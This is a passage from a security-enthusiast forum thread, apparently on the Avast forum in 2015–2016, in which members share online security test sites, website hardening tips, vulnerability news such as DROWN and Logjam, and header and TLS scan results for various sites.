-pool-100-36-126-180.washdc.fios.verizon.net seems involved -> http://toolbar.netcraft.com/site_report?url=http://pool-100-36-126-180.washdc.fios.verizon.net
Another one here: http://toolbar.netcraft.com/site_report?url=107.141.170.82  = 
107.141.170.82|csra|443|0|RSVX|3407827|Tor 0.2.6.8|rjwin@acpressuretest.com  etc.

pol

Title: Re: Tests and other Media topics
Post by: polonus on November 01, 2015, 01:25:55 PM
israeli Neural Network AV Deep Instinct will catch 20% more malware: http://www.technologyreview.com/news/542971/antivirus-that-mimics-the-brain-could-catch-more-malware/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2015, 05:44:18 PM
Test your Magento shop for Shoplift backdoor patch here: https://www.magereport.com/
The backdoor enables criminals to get to credit card info....

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 28, 2015, 11:49:21 PM
With me it won't work, but here are 5 ways to come and "block" an adblocker.

1. Blocking in a blunt way as Yahoo tested on a minor scale: https://www.washingtonpost.com/news/the-switch/wp/2015/11/23/yahoo-escalates-the-war-on-ad-blockers-by-keeping-people-out-of-their-own-e-mail/
2. Buy off ads with a service like Adieu: http://www.adieu.io/
3. Buy from Blockers like with Acceptable Ads by ABP.
4. Abuse root certificates like Lenovo did with a BHO from Superfish. This one backfired grand time, Superfish went broke.
5. A polite request to whitelist the site for the Adblocker used. Some reward the whitelisting user with a nice picture.
Like your teacher did at school when you had learned your psalm verses by heart  ;)
Yes some treat ads like a religion...  ;D

I still would not lower the adblock visors on all 5 mentioned counts as no-one has given a 100% guarantee that unblocked ads could come  completely malware free. So in order to go without mal-ads I block all.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 30, 2015, 03:18:47 PM
Jus bookmarked this link: http://www.419eater.com/
and another one on scams: http://www.scamvoid.com/check/

polonus
Title: Re: Tests and other Media topics
Post by: Simion on November 30, 2015, 04:34:06 PM
Jus bookmarked this link: http://www.419eater.com/
and another one on scams: http://www.scamvoid.com/check/

polonus

Hi polonus:

I'm "enjoying" your first link quite a bit, but your second link goes to a 404 Not Found error. Should be: http://www.scamvoid.com/
Title: Re: Tests and other Media topics
Post by: polonus on December 06, 2015, 01:47:30 AM
Nice bookmarklet to add: http://www.phpied.com/quirks-bookmarklet/  Code Source: Stoyan Stefano
will tell you whether or not the browser renders your page in Standards Complaiance Mode or Quirks Mode. The bookmarklet will figure this out for the page as well as for all the frames (and their frames) recursively. Enjoy!

polonus

P.S. For your information the apge you are looking at here is in CSS1Compat, but this message is BackCompat and cannot be seen!  ;)
Title: Re: Tests and other Media topics
Post by: polonus on December 08, 2015, 12:24:06 AM
Interesting search site: -https://crt.sh/? Enter an Identity (Domain Name, Organization Name, etc),
a Certificate Fingerprint (SHA-1 or SHA-256) or a crt.sh ID:
(% = wildcard)
Check for phishers that use free let's encrypt certificates here: -https://crt.sh/? Identity Search
See the Google Safebrowsing alert here: -https://www.electronicfrontierfoundation.org/
Before "let's encrypt" came in, was such a thing possible? Consider this safe entry: https://www.eff.org/

polonus (volunteer website security analyst and website error-hunter)

P.S. Another good search site for such abuse: -https://exchange.xforce.ibmcloud.com/url/cpe-198-72-160-0.socal.res.rr.com
(to go there use the address without the preceding -)

D
Title: Re: Tests and other Media topics
Post by: bob3160 on December 08, 2015, 12:34:02 AM

I even got a warning from Google in the email notification to this post:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1449531084073-42777.png)
Title: Re: Tests and other Media topics
Post by: polonus on December 08, 2015, 01:04:18 AM
Hi bob3160,

Break your links in the quote, please, like I did and that Google warnings goes,

damian

Title: Re: Tests and other Media topics
Post by: Gopher John on December 08, 2015, 07:54:08 PM
https://isc.sans.edu/forums/diary/Patch+Tuesday+Warmup+Internet+Explorer+Sunset+and+Windows+XP+Embedded+End+of+Support/20459/ (https://isc.sans.edu/forums/diary/Patch+Tuesday+Warmup+Internet+Explorer+Sunset+and+Windows+XP+Embedded+End+of+Support/20459/)

Patch Tuesday Warmup: Internet Explorer Sunset and Windows XP Embedded End of Support

As we are waiting for the Microsoft Santa to slide down our Data Center air conditioning duct later today to deliver a delicious package of patches (did you leave some floppy disks and a can of red bull out for him?), we got a couple other announcements from Microsoft that should not be overlooked:

- January will be the last month Microsoft will provide updates for any Internet Explorer version other than Internet Explorer 11! Even Internet Explorer 10 will no longer be supported after January patch Tuesday (January 12th, 2016).

- Support will also end for Windows XP Embedded. This will also make it more difficult for other Windows XP left-overs that tricked their version to use the Embedded updates. But nobody should be running XP anyway (right?).

- Still running Windows 7 or 8.1 (sure way to stay on MSFT Santa's "naughty" list)? Rumor has it that with today's patch Tuesday, Microsoft may re-enable the auto-upgrade to Windows 10. You may flip the switch back to not update, but it will set itself to "on" once a day.

[1] https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support
[2] https://support.microsoft.com/en-us/lifecycle/search/default.aspx?=&alpha=Windows%20XP
​[3] http://www.computerworld.com/article/3012278/microsoft-windows/microsoft-sets-stage-for-massive-windows-10-upgrade-strategy.html#tk.rss_all
Title: Re: Tests and other Media topics
Post by: polonus on December 14, 2015, 02:05:07 PM
Untraceable communication launched: http://news.mit.edu/2015/untraceable-anonymized-communication-guaranteed-1207
Code can be found here: https://github.com/davidlazar/vuvuzela  &  https://github.com/jlmart88/vuvuzela-web-client
With a network manager this cannot be safe. Just like the real Vuvuzela will produce, a lot of noise from hot air.....
The future is to go server-less: https://github.com/ricochet-im/ricochet
and another alternative for just the addressee: https://bitmessage.org/wiki/Main_Page

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 15, 2015, 01:46:48 AM
Detecting what Ghostery does and abusing it for ad-tracking....http://blog.securitee.org/?p=277
Some of the code mentioned in the reports seems also to disable Adgueard protection,
I reported a beta test form to them..https://news.ycombinator.com/item?id=4907609

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 15, 2015, 02:16:59 PM
Some things to ponder on: http://www.nedhardy.com/wp-content/uploads/images/2011/may/huxley_vs_orwell_2.jpg

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 17, 2015, 04:45:40 PM
F-Secure launches free sandbox to test malware: https://labsblog.f-secure.com/2015/12/17/see-sandboxed-execution-environment/  &  https://github.com/F-Secure/see

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 30, 2016, 01:28:54 AM
Back to actuality and worth to test your server against TLS Logjam: https://tools.keycdn.com/logjam
OK and upgrade and patch whenever one could implement.
Another test there HTTP/2 Test - a simple test to verify your server: https://tools.keycdn.com/http2-test
Results:
HTTP/2 Test Result forum.avast.com

Negative! forum.avast.com does not support HTTP/2.0. Supported protocols: http/1.1
ALPN is not supported. (Confirmed here: http://www.webconfs.com/http-header-check.php )

For a SPDY check go here: https://spdycheck.org/
For the forums here: SPDY Protocol Not Enabled!
Seriously? This SSL/TLS server is using the NPN Entension to tell browsers it supports alternative protocols, but SPDY is not a protocol it supports. The server is not making SPDY an option. Since all the pieces are in place, hopefully it will be easy to enable SPDY support with this server.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 31, 2016, 12:31:12 AM
No more dead links thanks to open source Amber plug-in for custom CMS: http://amberlink.org/

see: http://www.youtube.com/embed/25Kz7PqapG4

By the way always keep your CMS up to date, disable user enumeration and directory listing for WordPress etc.,
retire old and left code (zip-file for later reference) for jQuery libraries; harden your server software and
let your server software not "talk that loud", for instance via excessive server header info proliferation.
Cookies not flagged as "HttpOnly" may be read by client side script. Websites are at risk of a clickjacking attack when they allow content to be embedded within a frame.....

So stay safe and secure, and that is the wish of,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 31, 2016, 11:34:41 PM
Play these old dosgames in the browser from archives, like for instance: https://archive.org/details/msdos_Prince_of_Persia_1990
or Wolfenstein: https://archive.org/details/msdos_Wolfenstein_3D_1992
Sim City first code released: http://weblogs.asp.net/bsimser/simcity-source-code-released-to-the-wild-let-the-ports-begin
Stunts: https://archive.org/details/msdos_Stunts_1990   for the old style gamer.
etc. etc. Source article with more examples: Donovan Kerssenberg

pol
Title: Re: Tests and other Media topics
Post by: polonus on February 10, 2016, 12:28:20 AM
SRI Hash Website Scanner to to scan any website for Subresource Integrity (SRI) cryptographic hashes.
For what it is worth, read the commenting article here: http://www.theregister.co.uk/2016/01/15/china_github_attack_defence_test/
link article author = John Leiden
We are safe here:
Site
https://forum.avast.com/index.php?action=post;topic=129271.330;last_msg...
Scan Date
Today at 12:26 AM
Status Code
HTTP 302 Found (Redirect)
Scripts
Found 0 unsafe scripts out of 0 script tags
Stylesheets
Found 0 unsafe stylesheets out of 0 stylesheet tags
Also read: https://frederik-braun.com/using-subresource-integrity.html

Enjoy, my good friends, enjoy, example scan: https://sritest.io/#report/04fc4b00-34a8-4b60-9c79-4031cd0c65e5

A Word-Press plug-in to automatically insert Subresource Integrity attributes: https://wordpress.org/plugins/wp-sri/

polonus (volunteer website security scanner and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 11, 2016, 04:09:01 PM
Website owners should seek to prevent their websites from getting attacked and compromised/abused/defaced etc.
Check here with Uptime Robot, it is for free: http://uptimerobot.com/#newUser

A few tips to prevent website hacks and defacements.

1. Always keep your server operation software and any other software that is running on your website up to date.
Know that attackers are know to abuse out of date or left software.

2. Hosting company managment solution should keep you secure. Go for dedicated hosting. Whenever on shared hosting,
get to know your neighbors, else ask to be moved out on a different server.
Cheap or free bulk hosting will give you two rewards you do not want - security issues or performance issues.
The choice of a good hosting provider is the most important choice you may come to make.

3. With CMS and forum software apply security updates. WordPress should notify you whenever you log in.
Disable user enumeration and directory listing. Update (free) plug-ins and retire left code.

4. Always use parameteriosed queries to avoid risks of Standard Transact SQL.

5. XSS. Always ensure you check om data that are being submitted and encode or strip out HTML.
Use SRI hashed attributes, the solution came out of beta now. There is a free WordPress plug-in for it.

6. Keep your server and CMS software silent, do not let it speak out loud, keep your error messages vague.

7. Use an appropriate complex password routine, store them encrypted and salted.

8. Prevent direct access to uploaded files alltogether, store them outside root or on a blob.

9. Have your database on a different server and your webserver as well, so it cannot be directly accessed.

10. SSL. It is a good idea to use it for personal data that could become corrupted.

11. Block automated script attacks. Use code scanning as an early warning system. We started this posting on that one.

12. Scan for typical exploit code.

13. Use DNS Blacklists.

14. Avoid PHP running as a module when allowing global write permission.
 
15.Critical websites should undergo penetration testing.

16. Protect sensitive data by putting them in separate files for config and data base.
Avoid client side checking with Javascript, it is insecure.

17. Implement automated backups for actual website and supporting databases.

18. Disable anonymous FTP on your server. Only allow access from outside via ports 80 and 443.

19. Avoid public PCs and Wifi Points to get access to your admin panel. Use a VPN.
Do not update your blog from the barber shop. It looks cool, however it is insecure practice.

20. Check your logs. Limit access to your resources. Use stronger passwords, and do not use default ones.

Info credits go out to authors from Decision Group and mafudge


polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 01, 2016, 05:11:29 PM
A new serious vulnerability has been found for the SSL protocol, named DROWN - Decrypting RSA using Obsolete and Weakened eNcryption - Read on it here: https://www.drownattack.com/
And test for it here online: https://test.drownattack.com/
So what attacks will await us next, we had POODLE, Heartbeat, HEARTBLEED, and now we have DROWN.
One-third of all HTTPS websites open to DROWN attack!

polonus
Title: Re: Tests and other Media topics
Post by: Secondmineboy on March 01, 2016, 05:13:29 PM
A new serious vulnerability has been found for the SSL protocol, named DROWN - Decrypting RSA using Obsolete and Weakened eNcryption - Read on it here: https://www.drownattack.com/
And test for it here online: https://test.drownattack.com/
So what attacks will await us next, we had POODLE, Heartbeat, HEARTBLEED, and now we have DROWN.
One-third of all HTTPS websites open to DROWN attack!

polonus

Bad news for us: https://test.drownattack.com/?site=forum.avast.com
Title: Re: Tests and other Media topics
Post by: bob3160 on March 01, 2016, 05:20:34 PM
A new serious vulnerability has been found for the SSL protocol, named DROWN - Decrypting RSA using Obsolete and Weakened eNcryption - Read on it here: https://www.drownattack.com/ (https://www.drownattack.com/)
And test for it here online: https://test.drownattack.com/ (https://test.drownattack.com/)
So what attacks will await us next, we had POODLE, Heartbeat, HEARTBLEED, and now we have DROWN.
One-third of all HTTPS websites open to DROWN attack!

polonus

Bad news for us: https://test.drownattack.com/?site=forum.avast.com (https://test.drownattack.com/?site=forum.avast.com)
(http://screencast-o-matic.com/screenshots/u/Lh/1456849248194-21647.png)
Title: Re: Tests and other Media topics
Post by: polonus on March 01, 2016, 05:46:21 PM
I go for bob's results, as they come confirmed here:
https://test.drownattack.com/?site=https%3A%2F%2Fwww.avast.com%2Findex
Quote
Results for com/index
We have not identified any vulnerable servers matching this name. It’s possible that our scans missed something, or that there are vulnerable devices behind your firewall. For such devices, we recommend using our client-side scanning software.

polonus
Title: Re: Tests and other Media topics
Post by: Secondmineboy on March 01, 2016, 05:52:16 PM
I go for bob's results, as they come confirmed here:
https://test.drownattack.com/?site=https%3A%2F%2Fwww.avast.com%2Findex
Quote
Results for com/index
We have not identified any vulnerable servers matching this name. It’s possible that our scans missed something, or that there are vulnerable devices behind your firewall. For such devices, we recommend using our client-side scanning software.

polonus

Theres a patch already released for SUSE and SUSE based systems :)

There are 3 patches released: https://download.suse.com/Download?buildid=urp9l5AblyY~

Just as an example.
Title: Re: Tests and other Media topics
Post by: polonus on March 01, 2016, 06:29:21 PM
Hope server admins will implement these, as I still see a lot of vulnerable server around.
Also strange why a netcraft tool does not flag for DROWn attack.
Mind that the online test may just be an indication, there is false positives on detected servers
and clean servers that may be found vulnerable in the end.
Together with the cookies MONSTER your security, even with encryption - http://www.theregister.co.uk/2015/09/25/cookies_monster_your_security/
we have quite some insecurity of the protocol.

polonus
Title: Re: Tests and other Media topics
Post by: Secondmineboy on March 01, 2016, 06:33:31 PM
Hope server admins will implement these, as I still see a lot of vulnerable server around.
Also strange why a netcraft tool does not flag for DROWn attack.
Mind that the online test may just be an indication, there is false positives on detected servers
and clean servers that may be found vulnerable in the end.
Together with the cookies MONSTER your security, even with encryption - http://www.theregister.co.uk/2015/09/25/cookies_monster_your_security/
we have quite some insecurity of the protocol.

polonus

https://blog.cloudflare.com/the-drown-attack/
Title: Re: Tests and other Media topics
Post by: polonus on March 08, 2016, 06:19:21 PM
Test a website for SRI hashes as here with a random example: https://sritest.io/#report/5c1788c0-9ac2-4832-9874-9fba8e76c4ca
And then in case of a SRI hash missing generate that SRI Hash: https://www.srihash.org/
Example:  [script] <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js" integrity="sha384-EaUkI/FiMJtEXWAl0dCczvbFvjfzsIF1UNKGJvu9p5JIG71Kih7/kQJvYbBL7HOn" crossorigin="anonymous"></script> [-script]

Enjoy, my good friends, enjoy,

Damian

P.S. on crossorigin re: http://docs.trackjs.com/tracker/tips.html
Title: Re: Tests and other Media topics
Post by: polonus on March 21, 2016, 01:32:13 PM
Test your non-existent privacy on apps like WhatsApp just to be aware of it all the time you are online:
https://maikel.pro/blog/en-whatsapp-privacy-options-are-illusions/
AdDetector and AdNetworkDetector apps also give you a less intrusive insight of what you share with their servers and
with facebook that owns WhatsApp with a Saudi Prince as it´s largest stakeholder.
Privacy options do work, but probably not as user intented, so as you are the product. ;)
It is a over a billion dollar business model.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 23, 2016, 06:54:02 PM
Worldwide OONI explorer shows internet censhorship  and network anomalies:
https://explorer.ooni.torproject.org/explore/
and https://explorer.ooni.torproject.org/world/
Example: https://explorer.ooni.torproject.org/measurement/qt5XiB0z4rf6gBQOJUXFQdSVv1Uzf0f8xwKmKAjLevbBK61c3dvXxgK3xwCdkU2c

enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 25, 2016, 07:22:24 PM
List of Certificate Authorities that Google does not trust: https://www.certificate-transparency.org/known-logs
One easy method is to visit your site in Chrome and then click on the green padlock, "Connection" tab and then look for text indicating whether the site is "publicly auditable".  If you see text showing that the site is, that means that your server is returning SCT responses to Chrome.  On some platforms Chrome will additionally display a link to view "Transparency Information".

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 25, 2016, 08:33:47 PM
Chrome is predicting where you could go. Go herein the Chrome browser and see for yourself: chrome://predictors/
You see your whole prefetch history. This omnibox functionality could be somewhat of a privacy concern,
read here: http://jordan-wright.com/blog/2014/12/18/chrome-tracks-every-key-typed-into-omnibox/

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on March 26, 2016, 02:15:51 AM
Chrome is predicting where you could go. Go herein the Chrome browser and see for yourself: chrome://predictors/
You see your whole prefetch history. This omnibox functionality could be somewhat of a privacy concern,
read here: http://jordan-wright.com/blog/2014/12/18/chrome-tracks-every-key-typed-into-omnibox/ (http://jordan-wright.com/blog/2014/12/18/chrome-tracks-every-key-typed-into-omnibox/)

polonus
Strange that the article said that this setting was enabled by default ???
Here's my setting and I certainly haven't change a setting I don't even know exists.
(http://screencast-o-matic.com/screenshots/u/Lh/1458954806198-47246.png)
Title: Re: Tests and other Media topics
Post by: polonus on March 29, 2016, 12:39:51 AM
Hi bob3160,

Thanks for checking for us  ;)

Another test: http://mobify.site/results/http%3A%2F%2Fsandbox.onlinephpfunctions.com%2F
An example from a scan to test whether a website is fit for Mobile or should be adopted.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2016, 05:29:11 PM
Check whether your email address or username have been compromised: https://haveibeenpwned.com/
Should you change your password? Read here: http://www.forbes.com/sites/adamtanner/2014/04/14/these-sites-tell-which-of-your-accounts-have-been-hacked/#25385bbd4e8e
But this checking site itself does not seem secure (PHISHING): htxps://shouldichangemypassword.com/   known cloudfront abuse!
It just comes with a meagre T-Status...
while this seems the proper check site for that: https://breachalarm.com/

And again polonus wants to remark: "What is security on the Interwebs, according to us here that educate towards a better and more secure website security standards, like Pondus, Steven Winderlich, Eddy and several others - we can only say security is relative. Look here: https://securityheaders.io/?q=breachalarm.com  scores a very meagre R-Status and following the redirect to the https page there we will get a D-Status: https://securityheaders.io/?q=https%3A%2F%2Fbreachalarm.com%2F  This all for what that is worth.
And here we do not reach any further than an F-Status: https://sritest.io/#report/b71813c2-9458-4bde-8c40-b564a60de8cf

So whatever you do on the Interwebs be fully aware of the fact  that generally speaking it is a rather insecure place with software that  often has not been implemented/updated and patched right and has been weakened and holed on purpose to suit those parties best that wanna earn from your clicks or store your metadata for general surveillance purposes, not speaking of all the cybercriminals with bad intentions.

To come to a slightly more secure Internet a lot of work still needs to be done and a lot of education towards such goals may be necessary. Good if this posting served this goal to make you all a little bit more aware of the actual (in)security status of where you surf. Be on top of it feeling secure and not in the role of a serf. Keep your visors up and go with Avast's protection.

polonus (volunteer website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: Secondmineboy on April 25, 2016, 05:41:10 PM
Check whether your email address or username have been compromised: https://haveibeenpwned.com/
Should you change your password? Read here: http://www.forbes.com/sites/adamtanner/2014/04/14/these-sites-tell-which-of-your-accounts-have-been-hacked/#25385bbd4e8e

polonus

Have my GMail account breached by the Avast Forum hack and Malwarebytes hack Forum, even tho on the latter one i didnt even know i have an account there at all.
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2016, 06:27:21 PM
This is sort of proof  that what we claim here about insecure or potentially insecure websites is true: http://www.theregister.co.uk/2016/04/19/google_80000_sites_breached/

Often it is that website software is not secured in a proper way or the cocktail of security measures and securing code is hampering overall security or rather will lead to less security if a cocktail of the wrong layered security measures has been implemented. There a lot of webmasters/webadmins that still are not aware how to properly condition website security - (user enumeration enabled, directory listing enabled, no security headers implemented, https security not properly implemented, outdated or even left  (inline) javascript code installed, iFrame insecurity, sql/xss insecurity, servers speaking out too loud, BEAST, POODLE, DROWN, SHA1 vulnerablity, PHP exploits etc. etc.

When are we going to properly train these people that should keep their visitors secure, and/or demand they have been properly trained and then we also have to go against those parties that profit from the general overall insecurity and therefore will not complain nor wanna change that existing situation soon.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 01, 2016, 02:40:23 PM
Interesting link on "bad ISPs": https://wiki.vuze.com/w/Bad_ISPs
So ISPs that seems to frustrate various P2P-ing users.

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 01, 2016, 04:39:44 PM
MS gonna alert against weak SHA-1 weak cryptographic algorithms in IE and Edge: https://blogs.windows.com/msedgedev/2016/04/29/sha1-deprecation-roadmap/
Check on sha-1: https://shaaaaaaaaaaaaa.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 04, 2016, 10:34:00 PM
Folks, two DNS tests, Wildcard domains DNSSEC resolver test, to test whether you can connect to all websites: http://0skar.cz/dns/en/
and a check whether your ISP resolves all the domain names you request, so they know all you do on the Interwebs: https://www.dnsleaktest.com/
click on extended test and wait for the results. Whenever you find your ISP DNS in that list it means you are in their dragnet.  ::)

polonus
Title: Re: Tests and other Media topics
Post by: mchain on June 06, 2016, 09:35:24 PM
Folks, two DNS tests, Wildcard domains DNSSEC resolver test, to test whether you can connect to all websites: http://0skar.cz/dns/en/
and a check whether your ISP resolves all the domain names you request, so they know all you do on the Interwebs: https://www.dnsleaktest.com/
click on extended test and wait for the results. Whenever you find your ISP DNS in that list it means you are in their dragnet.  ::)

polonus
I would think attached below would show such dragnet behavior:
Title: Re: Tests and other Media topics
Post by: polonus on July 08, 2016, 07:17:31 PM
Found some issues here: https://forum.avast.com/index.php?topic=188252.0
and then thought to myself how this could work out for the the client (e.g. in the browser)
and stumbled upon this test site: https://tlsfun.de/  source: Hanno Böck
like this one for example: https://sslelement.hboeck.de/
and various other test scans.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 23, 2016, 04:00:52 PM
All browser extensions that exist are not capable of masking the uniqueness of your identifiable browser, not even via a webproxy of sort.
Going under in the herd is your best option. Good Adobe Flash will be left, because it uniquely identiefies your browser and your native client, wdevine content desription module and Wdevine adapter, Time Zone, User Agent are known.
Your browser has a unique fingerprint and that could be linked to your browsing.
JS-accessible browser objects like navigation and screen makes your browser detectable in every detail.

Test here: https://panopticlick.eff.org  and then here for canvas fingerprint: https://www.browserleaks.com/canvas
When I have javascript disabled, e.g. via a webproxy I get:
JavaScript Disabled — Canvas element is part of HTML5 and is accessible via JavaScript API
Canvas Support in Your Browser
Canvas (basic support)   ?
Text API for Canvas   ?
Canvas toDataURL   ?
Database Summary
Unique User-Agents   109000
Unique Fingerprints   4875
Your Fingerprint
Signature   N/A
Found in DB   N/A

But then probly the webproxy logs have these details.

Now folks let us generate our own online UUID (universally unique identifier)  with this generator: https://www.uuidgenerator.net/
and https://www.guidgenerator.com/online-guid-generator.aspx

What is a Version 1 UUID?
A Version 1 UUID is a universally unique identifier that is generated using a timestamp and the MAC address of the computer on which it was generated.

Also use: https://www.uuidgenerator.net/version4

What is a version 4 UUID?
A Version 4 UUID is a universally unique identifier that is generated using random numbers. The Version 4 UUIDs produced by this site were generated using a secure random number generator.

0186afb4-e911-47de-89da-ea0c4e0a72ee
a48c5abb-b750-4591-a9d6-40dab0338aa4
34a94f63-5653-409a-bf22-0fb758f2c794

enjoy,

polonus

P.S. Do go down in the noise produced by this extension to mask your canvas fingerprinting,
 use Canvas Defender extension for firefox and chrome:
https://chrome.google.com/webstore/detail/canvas-defender/obdbgnebcljmgkoljcdddaopadkifnpm/related

D
Title: Re: Tests and other Media topics
Post by: polonus on August 23, 2016, 10:42:15 PM
Misconfiguration and mistakes in configuring and managing DNSSEC servers may help exploitation via DNS reflection attacks, responding to a feature DNS "ANY" query providing all sort of info on the domain.

Such poorly configured DNSSECservers could amplify attacker's traffic by 28.9 times.

"ANY" requests should be filtered out and put abuse-detection mechanism in place. Source:  Richard Chirgwin on The Register.

Hence we test: http://dnssec-debugger.verisignlabs.com/server78.bertina.us
and re-test: http://dnsviz.net/d/

Re example: http://dnsviz.net/d/server78.bertina.us/dnssec/
error: bertina.us zone: The server(s) were not responsive to queries over TCP. (185.88.153.173)

enjoy,

polonus (volunteer website security analyst and website error-hunter)

P.S. Nice system to check: https://bintray.com/rafaeljusto/deb/shelter
Online check semver: http://jubianchi.github.io/semver-check/
Given the version you entered:

The next major release will be 2.0.0
The next minor release will be 1.1.0
The next patch release will be 1.0.1

Damian
Title: Re: Tests and other Media topics
Post by: polonus on August 26, 2016, 12:07:19 PM
Observatory Mozilla Scan: https://observatory.mozilla.org/
Example: https://observatory.mozilla.org/analyze.html?host=www.aplusoassociates.com

The crpto checks: tls.imirhil.fr and  https://cryptoreport.websecurity.symantec.com/checker/
re: https://tls.imirhil.fr/smtp/www.aplusoassociates.com

For the forum: https://tls.imirhil.fr/https/forum.avast.com
No more than a meagre F-score  :o

pol
Title: Re: Tests and other Media topics
Post by: polonus on August 26, 2016, 01:49:18 PM
But to truely discern about insecure versus secure setting,
one has to know how to configure according best practices,
and what third party choices one should make.

For instance for __cfduid cookie from Cloudflare,

not with proper settings like here:

Cookie security options (2 cookies)

Quote
Secure cookies: Warning

Requested URL: https://www.security.nl/ | Response URL: https://www.security.nl/ | Page title: Security.NL | HTTP status code: 200 (OK) | Response size: 58,066 bytes (gzip'd) | Duration: 645 ms
Overview
Cookies served over HTTPS but not flagged as "secure" may be sent over an insecure connection by the browser. Often this may be a simple request for an asset such as a bitmap file but if it's on the same domain as the cookie is valid for then it will be sent in an insecure fashion. This poses a risk of interception via a man in the middle attack.

Result
It looks like a cookie is being served over HTTPS without the "secure" flag being set (name : value):

__cfduid : d35d12748d6////////////6e3c478281472209606

Unless the cookie needs to be sent over an insecure connection, the "secure" flag should always be set to ensure it can only be sent with an HTTPS request.

Then it seems it cannot be disabled as it is a tracking cookie for CloudFlare to decide who is trusted/non-trusted.

Read: http://webmasters.stackexchange.com/questions/59226/disable-cfduid-cookie-from-cloudflare

Verdict: Host-only attribute insecure.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2016, 01:54:43 PM
For a lot of sites that should, like for instance banking sites, we often find that the content security policy (CSP) header is not being set. This makes the website vulnerable to scripting injections (often reflected XSS via swf objects).

CSSStyleSheet insert Rule()" not permitted. Why? -stylesheet originates from other (sub)domain and cannot run from script (as sandbox blocks). CSP does not permit 'unsafe.inline' for 'style-src' (and no nonce and/or hash set to be validated) so the whole style-tag is not permitted.

CSP prevents that non-trusted sources be trusted (developer-set).

CSP also blocks marketing-pixels and tag-manager will not function properly and directly for new pixel domains
(good actually in a sys-admin position/view against aggressive marketing overlords,
so they cannot overrule good-sensed security *).

* But not all cloudhosting parties support CSP headers. Bad example here is Cloudfront.

Just some musings of mine to point out the importance of decent best policy security header implementation.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2016, 11:07:10 PM
HTTP Header check: https://hackertarget.com/http-header-check/
another way using their api: http://api.hackertarget.com/httpheaders/?q=http://www.google.com

See: https://adresults.nl/tools/header-checker/  &  https://headers.cloxy.net/
Re: http://www.internetmarketingninjas.com/header-checker/

Read: https://www.keycdn.com/blog/http-security-headers/  -> check: https://tools.keycdn.com/curl

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2016, 11:44:33 PM
Here for a random example, I check observatory results against Recx Security Analyzer extension results: https://observatory.mozilla.org/analyze.html?host=frontpage.fok.nl

HTTP Security Header returned cache-control no-cache with a warning, not according best policies.
Only access-control.allow.origin OK
allowallcookies, sessid and -cfduid Host-only attribute not returned, screen cookie HTTP only attribute not returned.

Quote
HTTP/1.1 200 OK
Date: Sat, 27 Aug 2016 20:53:27 GMT
Content-Type: text/html; charset=iso-8859-15
Connection: keep-alive
Set-Cookie: __cfduid=d5f6938f885ca343e19e68ad17de5c9fe1472331207; expires=Sun, 27-Aug-17 20:53:27 GMT; path=/; domain=.fok.nl; HttpOnly
Set-Cookie: token=83aec9f5940a64e2d1ad98c16e8a2234; path=/; domain=.fok.nl
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: vc=1; expires=Sat, 27-Aug-2016 20:56:27 GMT; path=/; domain=.fok.nl; httponly
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 2d9269c06bb621c8-EWR

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2016, 07:38:11 PM
An intelligent scan to perform for -www.modxcloud.com tested at
Quote
Domain Name: =www.modxcloud.com
URL Tested: -https://www.modxcloud.com
Number of items downloaded on page: 92

   Valid Certificate found.
   Certificate valid through: Sep 8 22:26:55 2017 GMT
Certificate Issuer: StartCom Ltd.
SSL Protocols Supported: TLSv1 TLSv1.1 TLSv1.2
   Total number of items: 92
Number of insecure items: 1
Insecure URL: -http://fonts.googleapis.com/css?family=Oxygen:700,400
Found in: -https://cdn3.modxcloud.com/assets/components/markdowneditor/css/cards.css

   Secure calls made to other websites:
-cdn5.modxcloud.com is valid and secure.

-cdn1.modxcloud.com is valid and secure.

-cdn2.modxcloud.com is valid and secure.

-cdn3.modxcloud.com is valid and secure.

-cdn4.modxcloud.com is valid and secure.

-use.typekit.net is valid and secure.

-ajax.googleapis.com is valid and secure.

Check at https://www.whynopadlock.com/check.php

Confirmed here: -https://www.modxcloud.com
Detected libraries:
jquery - 1.7.2 : (active1) -https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
(active) - the library was also found to be active by running code
1 vulnerable library detected

Blocked by scriptblocker = -https://assets.customer.io/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2016, 08:50:28 PM
Also insecure tracking there:
100% of the trackers on this site could be protecting you from NSA snooping.
Tell modxcloud.com to fix it.

 All trackers
At least 10 third parties know you are on this webpage.

 -cdn1.modxcloud.com
 -use.typekit.net
 -Google
